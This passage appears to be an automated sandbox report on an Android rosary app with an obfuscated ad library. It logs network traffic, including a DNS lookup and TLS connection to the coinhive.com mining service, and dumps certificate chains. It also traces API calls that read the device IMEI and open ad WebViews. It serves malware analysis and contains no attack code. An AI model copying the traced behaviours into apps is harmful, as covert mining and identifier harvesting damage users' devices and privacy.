Oct 30, 2017 12:37:17.975260019 CET52283687774.125.192.188192.168.1.33
Oct 30, 2017 12:37:17.975703955 CET368775228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:23.418400049 CET5936253192.168.1.338.8.8.8
Oct 30, 2017 12:37:23.516786098 CET53593628.8.8.8192.168.1.33
Oct 30, 2017 12:37:25.915740013 CET5182753192.168.1.338.8.8.8
Oct 30, 2017 12:37:26.055433035 CET53518278.8.8.8192.168.1.33
Oct 30, 2017 12:37:26.056488991 CET34361443192.168.1.3394.130.90.152
Oct 30, 2017 12:37:26.056544065 CET4433436194.130.90.152192.168.1.33
Oct 30, 2017 12:37:26.056629896 CET34361443192.168.1.3394.130.90.152
Oct 30, 2017 12:37:26.058927059 CET34361443192.168.1.3394.130.90.152
Oct 30, 2017 12:37:26.058954954 CET4433436194.130.90.152192.168.1.33
Oct 30, 2017 12:37:26.208116055 CET4433436194.130.90.152192.168.1.33
Oct 30, 2017 12:37:26.208591938 CET34361443192.168.1.3394.130.90.152
Oct 30, 2017 12:37:26.211185932 CET4433436194.130.90.152192.168.1.33
Oct 30, 2017 12:37:26.211203098 CET4433436194.130.90.152192.168.1.33
Oct 30, 2017 12:37:26.211213112 CET4433436194.130.90.152192.168.1.33
Oct 30, 2017 12:37:26.212546110 CET34361443192.168.1.3394.130.90.152
Oct 30, 2017 12:37:26.212588072 CET34361443192.168.1.3394.130.90.152
Oct 30, 2017 12:37:26.212618113 CET34361443192.168.1.3394.130.90.152
Oct 30, 2017 12:37:26.217994928 CET34361443192.168.1.3394.130.90.152
Oct 30, 2017 12:37:26.218015909 CET4433436194.130.90.152192.168.1.33
Oct 30, 2017 12:37:26.232328892 CET34361443192.168.1.3394.130.90.152
Oct 30, 2017 12:37:26.232414007 CET4433436194.130.90.152192.168.1.33
Oct 30, 2017 12:37:26.232531071 CET34361443192.168.1.3394.130.90.152
Oct 30, 2017 12:37:43.649162054 CET492635228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:43.649199963 CET52284926374.125.192.188192.168.1.33
Oct 30, 2017 12:37:43.649435997 CET492635228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:43.650125980 CET492635228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:43.650154114 CET52284926374.125.192.188192.168.1.33
Oct 30, 2017 12:37:43.918529987 CET52284926374.125.192.188192.168.1.33
Oct 30, 2017 12:37:43.918668985 CET492635228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:43.946388960 CET52284926374.125.192.188192.168.1.33
Oct 30, 2017 12:37:43.946419954 CET52284926374.125.192.188192.168.1.33
Oct 30, 2017 12:37:43.946810961 CET492635228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:43.946906090 CET492635228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:43.950764894 CET492635228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:43.950793982 CET52284926374.125.192.188192.168.1.33
Oct 30, 2017 12:37:43.951100111 CET492635228192.168.1.3374.125.192.188
Oct 30, 2017 12:38:22.660239935 CET333765228192.168.1.3374.125.192.188
Oct 30, 2017 12:38:22.660315037 CET52283337674.125.192.188192.168.1.33
Oct 30, 2017 12:38:22.660547018 CET333765228192.168.1.3374.125.192.188
Oct 30, 2017 12:38:22.661427975 CET333765228192.168.1.3374.125.192.188
Oct 30, 2017 12:38:22.661463976 CET52283337674.125.192.188192.168.1.33
Oct 30, 2017 12:38:22.918602943 CET52283337674.125.192.188192.168.1.33
Oct 30, 2017 12:38:22.918628931 CET52283337674.125.192.188192.168.1.33
Oct 30, 2017 12:38:22.918633938 CET52283337674.125.192.188192.168.1.33
Oct 30, 2017 12:38:22.918802977 CET333765228192.168.1.3374.125.192.188
Oct 30, 2017 12:38:22.918847084 CET333765228192.168.1.3374.125.192.188
Oct 30, 2017 12:38:22.918874979 CET333765228192.168.1.3374.125.192.188
Oct 30, 2017 12:38:22.940578938 CET52283337674.125.192.188192.168.1.33
Oct 30, 2017 12:38:22.940749884 CET333765228192.168.1.3374.125.192.188
Oct 30, 2017 12:38:22.943440914 CET333765228192.168.1.3374.125.192.188
Oct 30, 2017 12:38:22.943475008 CET52283337674.125.192.188192.168.1.33
Oct 30, 2017 12:38:22.943839073 CET333765228192.168.1.3374.125.192.188
Oct 30, 2017 12:39:40.359718084 CET547655228192.168.1.3374.125.192.188
Oct 30, 2017 12:39:40.359793901 CET52285476574.125.192.188192.168.1.33
Oct 30, 2017 12:39:40.360086918 CET547655228192.168.1.3374.125.192.188
Oct 30, 2017 12:39:40.361212969 CET547655228192.168.1.3374.125.192.188
Oct 30, 2017 12:39:40.361238956 CET52285476574.125.192.188192.168.1.33
Oct 30, 2017 12:39:40.683868885 CET52285476574.125.192.188192.168.1.33
Oct 30, 2017 12:39:40.683912992 CET52285476574.125.192.188192.168.1.33
Oct 30, 2017 12:39:40.683927059 CET52285476574.125.192.188192.168.1.33
Oct 30, 2017 12:39:40.684277058 CET547655228192.168.1.3374.125.192.188
Oct 30, 2017 12:39:40.684341908 CET547655228192.168.1.3374.125.192.188
Oct 30, 2017 12:39:40.684391022 CET547655228192.168.1.3374.125.192.188
Oct 30, 2017 12:39:40.689268112 CET52285476574.125.192.188192.168.1.33
Oct 30, 2017 12:39:40.689379930 CET547655228192.168.1.3374.125.192.188
Oct 30, 2017 12:39:40.691519022 CET547655228192.168.1.3374.125.192.188
Oct 30, 2017 12:39:40.691539049 CET52285476574.125.192.188192.168.1.33
Oct 30, 2017 12:39:40.691833019 CET547655228192.168.1.3374.125.192.188

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Oct 30, 2017 12:37:03.868417978 CET651353192.168.1.338.8.8.8
Oct 30, 2017 12:37:03.941587925 CET5365138.8.8.8192.168.1.33
Oct 30, 2017 12:37:23.418400049 CET5936253192.168.1.338.8.8.8
Oct 30, 2017 12:37:23.516786098 CET53593628.8.8.8192.168.1.33
Oct 30, 2017 12:37:25.915740013 CET5182753192.168.1.338.8.8.8
Oct 30, 2017 12:37:26.055433035 CET53518278.8.8.8192.168.1.33

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Oct 30, 2017 12:37:25.915740013 CET192.168.1.338.8.8.80xe35fStandard query (0)coinhive.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Oct 30, 2017 12:37:26.055433035 CET8.8.8.8192.168.1.330xe35fNo error (0)coinhive.com94.130.90.152A (IP address)IN (0x0001)

HTTPS Packets

TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
Oct 30, 2017 12:37:26.211213112 CET4433436194.130.90.152192.168.1.33CN=*.coinhive.com, OU=PositiveSSL Wildcard, OU=Domain Control ValidatedCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 28 02:00:00 CEST 2017Sat Sep 29 01:59:59 CEST 2018[[ Version: V3 Subject: CN=*.coinhive.com, OU=PositiveSSL Wildcard, OU=Domain Control Validated Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 26658317003285746363121333279857244085573308823102137205729012620640147823525052698316965457763411913676477546531548507312916356931304826388840013478651191545863546966144946708284128328089537376600460701305106235519311168604662007117437809864360205524441208790620413529958136189828304432173616254041149825089210744877965464274101827449045557934790603199550487724675704009047161638646414200391427441036585306267165507167134384741871902608741119881051105075175451173662844423504189356774777028862290201795506867227124530566941597848300713615938385221359484731520442541517570978960753558898721372817421144784152567509711 public exponent: 65537 Validity: [From: Thu Sep 28 02:00:00 CEST 2017, To: Sat Sep 29 01:59:59 CEST 2018] Issuer: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 0ae1e6bd 51fb3d8f 06be0db5 5ebde9df]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.6449.1.2.2.7][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1D 68 74 74 70 73 3A 2F 2F 73 65 63 75 72 65 ..https://secure0010: 2E 63 6F 6D 6F 64 6F 2E 63 6F 6D 2F 43 50 53 .comodo.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.coinhive.com DNSName: coinhive.com][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 29 F1 E5 DD 3B B5 06 C7 B5 5D B3 A1 05 6E F2 AC )...;....]...n..0010: E7 D1 CA 9F ....]]] Algorithm: [SHA256withRSA] Signature:0000: 27 AA 15 58 F2 86 A0 8A 0F 92 DC F7 79 16 03 20 '..X........y.. 0010: EC F1 40 B8 C0 CD BE D0 42 78 ED 2D A8 75 CD 1D ..@.....Bx.-.u..0020: 4E B9 03 4D 02 21 AB 14 54 DF 62 61 AD C8 AB B6 N..M.!..T.ba....0030: BC 40 CE 49 F5 E0 3C 30 63 8A D3 B9 22 CC A9 80 .@.I..<0c..."...0040: 15 0B 3E 53 E1 ED DA 43 14 EA 24 C9 DD 18 5A 80 ..>S...C..$...Z.0050: FC 0D 45 12 28 39 3C DE 82 D7 3D 2E 4F 92 26 84 ..E.(9<...=.O.&.0060: 7B B0 BD B3 51 5A 1F 5A B7 54 B3 BA 99 DA 1B 4C ....QZ.Z.T.....L0070: 89 27 2A 89 D5 C0 F6 97 D6 29 27 73 0B AF 71 32 .'*......)'s..q20080: 67 A4 9F 10 33 62 DB 63 9E 54 60 A3 C5 F9 19 B8 g...3b.c.T`.....0090: 35 DC 34 9E 45 28 1D 63 28 F9 CB E4 2F 33 0D A0 5.4.E(.c(.../3..00A0: 59 6F 1F CF B9 B8 31 38 A9 B5 77 F4 29 99 36 57 Yo....18..w.).6W00B0: 38 CA 11 65 2A 2C 10 86 81 09 D4 F1 D3 18 BF 28 8..e*,.........(00C0: AB 15 A0 B5 E5 73 F8 CB BA 6B 6D 1A 5F 57 BF 20 .....s...km._W. 00D0: 7A 46 EA 5F 14 2F 90 C4 8C 0C 5E BF 4F 3F 1E 72 zF._./....^.O?.r00E0: 97 31 9D EB 62 80 2E 47 63 03 21 F3 42 90 0E 4A .1..b..Gc.!.B..J00F0: EC 7E 07 3E 1B 6D C6 78 1B F8 BC FE 6A 90 71 C7 ...>.m.x....j.q.]
Oct 30, 2017 12:37:26.211213112 CET4433436194.130.90.152192.168.1.33CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029[[ Version: V3 Subject: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 2048 bits modulus: 18021508317891126045114383893640587389787314988023771299021472384098480478916503597778296613150634219765052113517870635171403307225477983047468706279013651027886500159485348697094115927961850381525182009137128777951162358715158533528593200093291791323275973789174789209802980910482500744419318360338528025872227868058578212418244189425301367382232973595110901594292490129763308095314503250053957090379265992785603931784956681691284995547158646635183735467516188519673313343149548166538558424521681954529559978463371620234598058977077392872218941503229331579208118464720991080636709101634982701306129953489796945248933 public exponent: 65537 Validity: [From: Wed Feb 12 01:00:00 CET 2014, To: Mon Feb 12 00:59:59 CET 2029] Issuer: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 2b2e6eea d975366c 148a6edb a37c8c07]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSAAddTrustCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSACertificationAuthority.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]]] Algorithm: [SHA384withRSA] Signature:0000: 4E 2B 76 4F 92 1C 62 36 89 BA 77 C1 27 05 F4 1C N+vO..b6..w.'...0010: D6 44 9D A9 9A 3E AA D5 66 66 01 3E EA 49 E6 A2 .D...>..ff.>.I..0020: 35 BC FA F6 DD 95 8E 99 35 98 0E 36 18 75 B1 DD 5.......5..6.u..0030: DD 50 72 7C AE DC 77 88 CE 0F F7 90 20 CA A3 67 .Pr...w..... ..g0040: 2E 1F 56 7F 7B E1 44 EA 42 95 C4 5D 0D 01 50 46 ..V...D.B..]..PF0050: 15 F2 81 89 59 6C 8A DD 8C F1 12 A1 8D 3A 42 8A ....Yl.......:B.0060: 98 F8 4B 34 7B 27 3B 08 B4 6F 24 3B 72 9D 63 74 ..K4.';..o$;r.ct0070: 58 3C 1A 6C 3F 4F C7 11 9A C8 A8 F5 B5 37 EF 10 X<.l?O.......7..0080: 45 C6 6C D9 E0 5E 95 26 B3 EB AD A3 B9 EE 7F 0C E.l..^.&........0090: 9A 66 35 73 32 60 4E E5 DD 8A 61 2C 6E 52 11 77 .f5s2`N...a,nR.w00A0: 68 96 D3 18 75 51 15 00 1B 74 88 DD E1 C7 38 04 h...uQ...t....8.00B0: 43 28 E9 16 FD D9 05 D4 5D 47 27 60 D6 FB 38 3B C(......]G'`..8;00C0: 6C 72 A2 94 F8 42 1A DF ED 6F 06 8C 45 C2 06 00 lr...B...o..E...00D0: AA E4 E8 DC D9 B5 E1 73 78 EC F6 23 DC D1 DD 6C .......sx..#...l00E0: 8E 1A 8F A5 EA 54 7C 96 B7 C3 FE 55 8E 8D 49 5E .....T.....U..I^00F0: FC 64 BB CF 3E BD 96 EB 69 CD BF E0 48 F1 62 82 .d..>...i...H.b.0100: 10 E5 0C 46 57 F2 33 DA D0 C8 63 ED C6 1F 94 05 ...FW.3...c.....0110: 96 4A 1A 91 D1 F7 EB CF 8F 52 AE 0D 08 D9 3E A8 .J.......R....>.0120: A0 51 E9 C1 87 74 D5 C9 F7 74 AB 2E 53 FB BB 7A .Q...t...t..S..z0130: FB 97 E2 F8 1F 26 8F B3 D2 A0 E0 37 5B 28 3B 31 .....&.....7[(;10140: E5 0E 57 2D 5A B8 AD 79 AC 5E 20 66 1A A5 B9 A6 ..W-Z..y.^ f....0150: B5 39 C1 F5 98 43 FF EE F9 A7 A7 FD EE CA 24 3D .9...C........$=0160: 80 16 C4 17 8F 8A C1 60 A1 0C AE 5B 43 47 91 4B .......`...[CG.K0170: D5 9A 17 5F F9 D4 87 C1 C2 8C B7 E7 E2 0F 30 19 ..._..........0.0180: 37 86 AC E0 DC 42 03 E6 94 A8 9D AE FD 0F 24 51 7....B........$Q0190: 94 CE 92 08 D1 FC 50 F0 03 40 7B 88 59 ED 0E DD ......P..@..Y...01A0: AC D2 77 82 34 DC 06 95 02 D8 90 F9 2D EA 37 D5 ..w.4.......-.7.01B0: 1A 60 D0 67 20 D7 D8 42 0B 45 AF 82 68 DE DD 66 .`.g ..B.E..h..f01C0: 24 37 90 29 94 19 46 19 25 B8 80 D7 CB D4 86 28 $7.)..F.%......(01D0: 6A 44 70 26 23 62 A9 9F 86 6F BF BA 90 70 D2 56 jDp&#b...o...p.V01E0: 77 85 78 EF EA 25 A9 17 CE 50 72 8C 00 3A AA E3 w.x..%...Pr..:..01F0: DB 63 34 9F F8 06 71 01 E2 82 20 D4 FE 6F BD B1 .c4...q... ..o..]
Oct 30, 2017 12:37:26.211213112 CET4433436194.130.90.152192.168.1.33CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SETue May 30 12:48:38 CEST 2000Sat May 30 12:48:38 CEST 2020[[ Version: V3 Subject: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 4096 bits modulus: 595250832037245141724642107398533641144111340640849154810839512193646804439589382557795096048235159392412856809181253983148280442751106836828767077478502910675291715965426418324395462826337195608826159904332409833532414343087397304684051488024083060971973988667565926401713702437407307790551210783180012029671811979458976709742365579736599681150756374332129237698142054260771585540729412505699671993111094681722253786369180597052805125225748672266569013967025850135765598233721214965171040686884703517711864518647963618102322884373894861238464186441528415873877499307554355231373646804211013770034465627350166153734933786011622475019872581027516832913754790596939102532587063612068091625752995700206528059096165261547017202283116886060219954285939324476288744352486373249118864714420341870384243932900936553074796547571643358129426474424573956572670213304441994994142333208766235762328926816055054634905252931414737971249889745696283503174642385591131856834241724878687870772321902051261453524679758731747154638983677185705464969589189761598154153383380395065347776922242683529305823609958629983678843126221186204478003285765580771286537570893899006127941280337699169761047271395591258462580922460487748761665926731923248227868312659 public exponent: 65537 Validity: [From: Tue May 30 12:48:38 CEST 2000, To: Sat May 30 12:48:38 CEST 2020] Issuer: CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE SerialNumber: [ 2766ee56 eb49f38e abd770a2 fc84de22]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.usertrust.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: AD BD 98 7A 34 B4 26 F7 FA C4 26 54 EF 03 BD E0 ...z4.&...&T....0010: 24 CB 54 1A $.T.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.usertrust.com/AddTrustExternalCARoot.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]]] Algorithm: [SHA384withRSA] Signature:0000: 64 BF 83 F1 5F 9A 85 D0 CD B8 A1 29 57 0D E8 5A d..._......)W..Z0010: F7 D1 E9 3E F2 76 04 6E F1 52 70 BB 1E 3C FF 4D ...>.v.n.Rp..<.M0020: 0D 74 6A CC 81 82 25 D3 C3 A0 2A 5D 4C F5 BA 8B .tj...%...*]L...0030: A1 6D C4 54 09 75 C7 E3 27 0E 5D 84 79 37 40 13 .m.T.u..'.].y7@.0040: 77 F5 B4 AC 1C D0 3B AB 17 12 D6 EF 34 18 7E 2B w.....;.....4..+0050: E9 79 D3 AB 57 45 0C AF 28 FA D0 DB E5 50 95 88 .y..WE..(....P..0060: BB DF 85 57 69 7D 92 D8 52 CA 73 81 BF 1C F3 E6 ...Wi...R.s.....0070: B8 6E 66 11 05 B3 1E 94 2D 7F 91 95 92 59 F1 4C .nf.....-....Y.L0080: CE A3 91 71 4C 7C 47 0C 3B 0B 19 F6 A1 B1 6C 86 ...qL.G.;.....l.0090: 3E 5C AA C4 2E 82 CB F9 07 96 BA 48 4D 90 F2 94 >\.........HM...00A0: C8 A9 73 A2 EB 06 7B 23 9D DE A2 F3 4D 55 9F 7A ..s....#....MU.z00B0: 61 45 98 18 68 C7 5E 40 6B 23 F5 79 7A EF 8C B5 aE..h.^@k#.yz...00C0: 6B 8B B7 6F 46 F4 7B F1 3D 4B 04 D8 93 80 59 5A k..oF...=K....YZ00D0: E0 41 24 1D B2 8F 15 60 58 47 DB EF 6E 46 FD 15 .A$....`XG..nF..00E0: F5 D9 5F 9A B3 DB D8 B8 E4 40 B3 CD 97 39 AE 85 .._......@...9..00F0: BB 1D 8E BC DC 87 9B D1 A6 EF F1 3B 6F 10 38 6F ...........;o.8o]

APK Behavior

Installation

Miscellaneous

Simulated Events

TypeData
boot completed
  • -
time tick
  • -
incoming sms
  • 0123456789
  • this is a text message
outgoing sms
  • 9876543210
  • thank you
location change
  • 54.13
  • 12.14
incoming call
  • 0123456789
outgoing call
  • 9876543210
time tick
  • -

Interacted Views

View Data
  • Object: android.widget.Button{8c81d6f VFED..C. ......I. 0,15-600,54 #7f070001 app:id/inizia}
  • X: 300
  • Y: 106
  • Label: Inizia

By Permission (executed)

By Permission (non-executed)

ACCESS_COARSE_LOCATION

API: android.location.LocationManager->getBestProvider at ..:150 Show source

ACCESS_NETWORK_STATE

API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:10 Show source
API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:13 Show source
API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:12 Show source
API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:10 Show source
API: android.net.ConnectivityManager->getActiveNetworkInfo at ..:10 Show source

ACCESS_WIFI_STATE

API: android.net.wifi.WifiManager->isWifiEnabled at com.vxjxu.jkhfn1870.UserDetails.getImei:90 Show source

INTERNET

API: org.apache.http.impl.client.DefaultHttpClient-><init> at com.vxjxu.jkhfn1870.SendIntegrationError$1.run:137 Show source
API: org.apache.http.impl.client.DefaultHttpClient-><init> at com.vxjxu.jkhfn1870.MraidView$6.run:68 Show source
API: java.net.URL->openConnection at com.vxjxu.jkhfn1870.MraidView$2$1.run:9 Show source
API: org.apache.http.impl.client.DefaultHttpClient-><init> at ..:5 Show source
API: android.webkit.WebView-><init> at com.vxjxu.jkhfn1870.ImageBanner.<init>:15 Show source
API: java.net.URL->openConnection at ..:21 Show source
API: org.apache.http.impl.client.DefaultHttpClient-><init> at ..:41 Show source
API: android.webkit.WebView-><init> at ..:31 Show source
API: android.webkit.WebView-><init> at ..:56 Show source
API: java.net.URL->openConnection at ..:10 Show source
API: org.apache.http.impl.client.DefaultHttpClient-><init> at com.vxjxu.jkhfn1870.NetworkThread.run:89 Show source
API: org.apache.http.impl.client.DefaultHttpClient-><init> at com.vxjxu.jkhfn1870.ImageBanner$2.run:68 Show source
API: android.webkit.WebView-><init> at com.vxjxu.jkhfn1870.MraidView.<init>:10 Show source
API: java.net.URL->openConnection at com.vxjxu.jkhfn1870.ImageTask.doInBackground:9 Show source
API: org.apache.http.impl.client.DefaultHttpClient-><init> at com.vxjxu.jkhfn1870.OverlayAd$3.run:69 Show source
API: android.webkit.WebView-><init> at com.vxjxu.jkhfn1870.OverlayAd.<init>:91 Show source
API: android.webkit.WebView-><init> at ..:5 Show source
API: android.webkit.WebView-><init> at ..:103 Show source
API: android.webkit.WebView-><init> at com.vxjxu.jkhfn1870.MraidView.<init>:12 Show source
API: android.webkit.WebView-><init> at com.vxjxu.jkhfn1870.BrowserActivity$BrowserView.<init>:12 Show source

READ_PHONE_STATE

API: android.telephony.TelephonyManager->getDeviceId at ..:81 Show source
API: android.telephony.TelephonyManager->getDeviceId at com.vxjxu.jkhfn1870.UserDetails.getImei:10 Show source

WAKE_LOCK or NONE

API: android.media.MediaPlayer->start at prsolutions.rosariofacileads.Player.playAudio:14 Show source
API: android.media.MediaPlayer->start at prsolutions.rosariofacileads.Player$2.onClick:35 Show source
API: android.media.MediaPlayer->stop at com.vxjxu.jkhfn1870.MraidView$AirpushWebChromeClient$1.onCompletion:3 Show source

By Class (executed)

prsolutions.rosariofacileads.Player

API: android.content.Intent->getExtras at prsolutions.rosariofacileads.Player.onCreate:8 Show source
NameTypeValue
Return Valueandroid.os.Bundle
  • toString: Bundle[mParcelledData.dataSize=32]
API: prsolutions.rosariofacileads.Player->setContentView at prsolutions.rosariofacileads.Player.SettaggioIniziale:4 Show source
NameTypeValue
layoutResIDjava.lang.Integer
  • toString: 2130903042
API: android.content.Context->getString at prsolutions.rosariofacileads.Player.FormattaOggi:64 Show source
NameTypeValue
resIdjava.lang.Integer
  • toString: 2131034126
NameTypeValue
Return Valuejava.lang.String
  • toString: Martedi
API: android.content.Context->getString at prsolutions.rosariofacileads.Player.FormattaOggi:67 Show source
NameTypeValue
resIdjava.lang.Integer
  • toString: 2131034117
NameTypeValue
Return Valuejava.lang.String
  • toString: Dolorosi
API: android.media.MediaPlayer->create at prsolutions.rosariofacileads.Player.playAudio:61 Show source
NameTypeValue
p0prsolutions.rosariofacileads.Player
  • toString: prsolutions.rosariofacileads.Player@1d08e6f3
p1java.lang.Integer
  • toString: 2130968600
NameTypeValue
Return Valueandroid.media.MediaPlayer
  • toString: android.media.MediaPlayer@12ecff8

prsolutions.rosariofacileads.RosarioFacile$2

API: prsolutions.rosariofacileads.RosarioFacile->startActivity at prsolutions.rosariofacileads.RosarioFacile$2.onClick:19 Show source
NameTypeValue
intentandroid.content.Intent
  • toString: Intent { cmp=prsolutions.rosariofacileads/.Player (has extras) }

By Class (non-executed)

com.vxjxu.jkhfn1870.AdView$2

API: android.os.Handler-><init> at com.vxjxu.jkhfn1870.AdView$2.<init>:3 Show source
API: com.vxjxu.jkhfn1870.AdView->setVisibility at com.vxjxu.jkhfn1870.AdView$2.handleMessage:9 Show source
API: com.vxjxu.jkhfn1870.AdView->setVisibility at com.vxjxu.jkhfn1870.AdView$2.handleMessage:15 Show source
API: com.vxjxu.jkhfn1870.AdView->setVisibility at com.vxjxu.jkhfn1870.AdView$2.handleMessage:21 Show source
API: com.vxjxu.jkhfn1870.AdView->access$000 at com.vxjxu.jkhfn1870.AdView$2.handleMessage:26 Show source

com.vxjxu.jkhfn1870.AdView$8$1

API: java.lang.Object-><init> at com.vxjxu.jkhfn1870.AdView$8$1.<init>:4 Show source
API: java.lang.Boolean->booleanValue at com.vxjxu.jkhfn1870.AdView$8$1.run:4 Show source
API: com.vxjxu.jkhfn1870.AdView->access$1100 at com.vxjxu.jkhfn1870.AdView$8$1.run:12 Show source
API: android.util.Log->e at com.vxjxu.jkhfn1870.AdView$8$1.run:19 Show source

com.vxjxu.jkhfn1870.AirPlay

API: org.json.JSONObject-><init> at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:8 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:12 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:19 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:27 Show source
API: org.json.JSONObject->isNull at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:33 Show source
API: java.lang.String->equals at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:38 Show source
API: android.content.Intent-><init> at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:50 Show source
API: android.content.Intent->setAction at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:54 Show source
API: android.content.Intent->setFlags at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:57 Show source
API: android.content.Intent->addFlags at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:60 Show source
API: android.content.Intent->addFlags at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:63 Show source
API: android.content.Intent->putExtra at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:69 Show source
API: android.content.Intent->putExtra at com.vxjxu.jkhfn1870.AirPlay.parseLandingPageAdJson:73 Show source
